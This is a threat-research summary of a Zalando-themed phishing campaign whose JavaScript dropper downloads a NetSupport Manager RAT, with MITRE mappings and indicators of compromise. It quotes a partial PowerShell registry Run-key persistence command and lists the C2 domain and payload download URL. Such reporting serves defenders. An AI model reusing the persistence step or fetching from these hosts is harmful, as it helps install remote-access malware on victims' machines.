Threat Research

From a Zalando Phishing to a RAT

Securonix

A Zalando phishing campaign delivered a JavaScript dropper that downloads a Windows RAT. The dropper uses obfuscation, BitsAdmin/PowerShell-based downloads, hides artifacts, and establishes persistence while contacting a NetSupport Manager RAT C2.

Keypoints

  • A phishing campaign targeted Zalando customers and used an attached archive to deliver malware.
  • The archive contains a JavaScript dropper (nine-life1107.js) that is obfuscated and references Windows scripting concepts.
  • The dropper uses Windows-based LOLBins (BitsAdmin / PowerShell) to download payloads from remote sites.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The attached archive contains a single JavaScript file. ‘The attached archive contains a single JavaScript file:’
  • [T1059.007] JavaScript – The script contains references to “WScript” to call the method “ShellExecute”. ‘The script contains some references to “WScript” to call the method “ShellExecute”… We are facing a script for Windows.’
  • [T1059.001] PowerShell – The dropper uses PowerShell to download and execute payloads; ‘This tool can be called directly from Powershell. That’s what the attacker is testing in this case.’
  • [T1105] Ingress Tool Transfer – The dropper downloads many files from a website; ‘download many files from a website.’
  • [T1564.001] Hide Artifacts – The directory attributes are modified to hide it. ‘and the directory attributes are modified to hide it.’
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys – The dropper establishes persistence via a Run registry key. ‘New-ItemProperty -Path ‘HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun’ -Name … -Value …’

Indicators of Compromise

  • [File] nine-life1107.js – dropper JavaScript file; nine-life1107.zip contains it
  • [File] client32.exe – NetSupport Manager RAT executable
  • [File] client32.ini – RAT configuration
  • [Hash] 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1
  • [Domain] jokosampbulid1[.]com:1412 – C2 server
  • [Domain] tukudewe[.]com – payload download host
  • [URL] https://tukudewe.com/js/h3b2_jsg/ – payload download path

Read more: https://isc.sans.edu/diary/From+a+Zalando+Phishing+to+a+RAT/30136/